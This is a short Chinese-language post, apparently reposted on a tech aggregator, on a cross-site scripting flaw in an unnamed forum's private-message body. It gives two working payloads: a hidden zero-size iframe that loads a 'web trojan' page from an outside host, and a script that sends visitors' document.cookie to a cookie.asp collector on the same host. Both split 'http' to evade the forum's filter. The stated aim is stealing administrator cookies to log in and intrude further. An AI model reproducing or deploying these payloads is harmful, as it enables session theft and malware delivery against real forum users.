跨站脚本攻击漏洞

cookiss

漏洞资料:
目前所涉及版本的论坛短信内容处没有做好细致的过滤,导致跨站脚本漏洞攻击的产生,使得
用户可以得到管理员的COOKIE 信息.从而进一步危害论坛.
漏洞利用:
在撰写短消息处正文内容上填上如下利用代码:
一,网页木马:

<script>document.write(\'<iframe src="ht\'+\'tp://www.r3j3ct.net/cnbct.htm" width="0"
height="0"></iframe>\')</script>

上述代码是一个iframe 代码.ht\'+\'tp://www.r3j3ct.net/cnbct.htm 作为网页木马之用,因论坛程序
短信息处对http 已作处理.故使用ht\'+\'tp 绕过限制触发漏洞效果.
二,偷取cookie:

<script>window.location=\'ht\'+\'tp://www.r3j3ct.net/cookie.asp?msg=\'+document.cookie</script>

上述为偷取cookie 代码.当用户访问短信息时就会自动获取cookie.从而保存txt 文件里.恶意
用户就会利用偷取到的Cookie 进行登录,修改受害人信息以及进一步入侵之用.

分类:

技术点:

相关文章:

  • 2022-03-13
  • 2021-07-14
  • 2022-12-23
  • 2021-05-27
  • 2022-12-23
  • 2021-11-03
  • 2021-04-03
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-11-25
  • 2021-12-12
  • 2021-11-03
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode